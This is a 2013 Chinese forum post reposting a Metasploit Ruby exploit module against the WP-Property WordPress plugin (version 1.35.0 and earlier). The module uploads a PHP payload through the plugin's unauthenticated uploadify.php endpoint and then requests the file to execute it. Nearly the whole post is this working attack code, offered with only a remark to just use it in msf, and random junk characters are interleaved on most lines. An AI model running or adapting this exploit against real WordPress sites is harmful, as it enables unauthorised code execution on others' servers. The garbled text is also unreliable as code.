WordPress WP-Property PHP 文件上传漏洞
5 j( B) l; \* S$ W6 }- @: W6 s# c/ `- S* y( V
## # This file is part of the Metasploit Framework and may be subject to: y7 z K1 s* C3 |9 f
0 h7 z' Q; H/ |% k, l$ T7 s' n
# redistribution and commercial restrictions. Please see the Metasploit# m' x0 M, H2 n1 c( _% l2 y
& Q' o+ F6 _$ `; ~# d! P# Framework web site for more information on licensing and terms of use.
& t8 j! Z& a4 [& [- I N _5 O* k4 {& u
# http://metasploit.com/framework/ ##
2 d0 j- u: {* d" K! c
7 g! W( S1 W0 o+ T( X7 L
. q* B' B! ?' j( y; x4 \9 x0 ^% {* g7 j4 s* W- @9 W6 \8 C+ J
3 q: L( F$ R# n# g- P4 U2 c* c' y
0 G: U R2 B8 W8 y. ?: grequire 'msf/core', V" j" B$ i" J _( O2 E& ?7 J- t" y
require 'msf/core/exploit/php_exe'
* n4 \# h4 @, V/ X+ c6 l/ [7 h
0 H9 [$ T0 f! @* Wclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
& N m/ \5 Q. _8 @9 z& e'Description' => %q{' {/ x" o0 ]- X( f/ g( ~1 _
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
- @- B% y& P3 c+ r[2 ~$ Z U9 h5 L7 y8 q+ p
'Sammy FORGIT', # initial discovery
5 s5 c. n- v! x- a. U'James Fitts <fitts.james[at]gmail.com>' # metasploit module
% ~% `& Q! v" w1 S5 T& [],7 s1 h& W \6 S9 C6 T1 p# n& Q8 L
'License' => MSF_LICENSE,
% R. `: ]0 I( ~! n4 t0 s1 Z'References' =>
3 u& P8 r( k1 ~# q, H[, i% n# J; A# ?
[ 'OSVDB', '82656' ],8 E6 l0 n7 o3 T1 H3 G
[ 'BID', '53787' ],
* M- L3 Q! |& _0 o6 }% e[ 'EDB', '18987'],
# @% R2 t( T* O; N' Z5 ~[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
" _/ b& x0 `3 a9 Y8 Q],
' P+ P2 H# f1 h9 |'Payload' =>
* A9 c7 d7 Q$ B# s! }; g$ t3 i{
. I7 B& t8 m1 o4 w7 S* r'BadChars' => "\x00",: _$ n6 U# N+ I2 f1 y" o( R. e
},) u1 g& {+ \; C9 `/ I, [, k
'Platform' => 'php',- r" \$ N' ]3 W$ L0 c9 f
'Arch' => ARCH_PHP,
5 x6 b; |! b) N" s'Targets' =>
$ v) [3 a$ n+ ^, b0 H) a[0 v6 q/ o& @: [" h. n8 n! l3 B
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],% _; T) E8 M ?
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
. b& y8 y9 I7 b5 @1 ^],. g0 h: J ~) {# k: i. ^; L
'DefaultTarget' => 0,$ N% J% ^4 `5 r, o, r) i- ?
'DisclosureDate' => 'Mar 26 2012'))* e* q. [ D& H* U% v8 f
2 i$ U2 s2 ?8 y' ^0 r
register_options(& N# G) j5 q2 p# a
[2 i8 H, R( c$ w8 v4 b
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])4 P8 x Z+ H) S3 w# H9 y! [2 R
], self.class), k" j0 H9 ?6 K; a- ^3 x% D
end
( E% }/ p% M( P
% z& \& V' q, K$ R3 g4 Wdef check
$ j' b5 N# i0 a$ p' muri = target_uri.path* I; H; D7 i+ @. k1 c# a
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
. ?5 o/ C) |, G; `) r'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
. P0 E8 z* }8 h% d! N C' I})
' D3 x: v2 W9 A! Y$ O; O8 s; `; p4 ?+ g% B2 z. _5 B8 L/ o3 h+ o
if not res or res.code != 200
8 y2 B/ l6 Z2 C5 e, z3 ]return Exploit::CheckCode::Unknown
( q4 }/ z' |5 w8 Qend& ^! y% n: i$ e
5 u) p ^0 e% k7 Z, ]+ A' ~6 h' ?return Exploit::CheckCode::Appears2 ?6 t9 ^" q/ ^. O8 [, i' d$ _# J
end
+ D3 k c' {+ T5 D2 E6 P3 F( G( R3 a% M* b6 M
def exploit
# r3 C2 C3 y: y! N9 y6 n. w" j( yuri = target_uri.path
3 H( u! G- I3 _' w0 v5 b' O! d0 W, kuri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)% ~$ y, m0 s b! h9 J# S$ O0 |2 ~' n
' D1 }2 d) m# U# t4 ^
data = Rex::MIME::Message.new
! W8 u8 e& U$ F2 ]3 ~' qdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")5 _- N+ X3 X8 X0 R
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")/ \! t5 {# I$ O
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_'): d7 Z& {" J% X4 R
3 a- c3 g. J; {2 |print_status("#{peer} - Uploading payload #{@payload_name}")
- N7 `$ } l' c& M3 pres = send_request_cgi({
6 h9 W: Y. s: i* K n'method' => 'POST',
- z8 j7 g% Z* B5 P. J$ F+ t8 ]& x'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",+ z' ?+ F# S: s2 ]7 f. P2 l
'ctype' => "multipart/form-data; boundary=#{data.bound}",9 U6 O6 q4 E/ r% v0 e
'data' => post_data3 m( E% u- \! ^) d' L3 @0 t" H5 ^
})3 z2 Q& r0 _% `4 |
B, ~$ r8 |& U+ ?- ~if not res or res.code != 200 or res.body !~ /#{@payload_name}/) ]% F- @+ X; z: L, Z
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
/ V: ]' R5 W9 ]5 A& N# P" w6 @. W! vend( h4 e D4 F( {8 t, V2 H7 w
2 o. |. Y1 w. O2 Uupload_uri = res.body( I% r- o2 L3 h6 X" B
- Q2 b9 K ?* J. u
print_status("#{peer} - Executing payload #{@payload_name}")+ {) p' Q: S. t2 Z. C b
res = send_request_raw({# V" C6 h Z4 p% n5 q( C1 I% z
'uri' => upload_uri,
: c# t |* P; [ z1 d'method' => 'GET'
: L2 v" I4 s0 I- Q5 ]- h})8 h5 f7 d h5 R
end
/ D* t0 P/ I1 {, ~* I- v8 c- zend8 {0 o! q# a4 F- L& |) d! W
/ T' ], ]) E2 m$ s6 m! T不要问我这写的是什么 怎么利用 我是说msf.
* ? M8 m+ ~) Z! ]) L! H- } l
' J5 V, d2 M! f/ g5 r7 P& U |
发表于 2013-1-4 19:51:30
收藏
支持
反对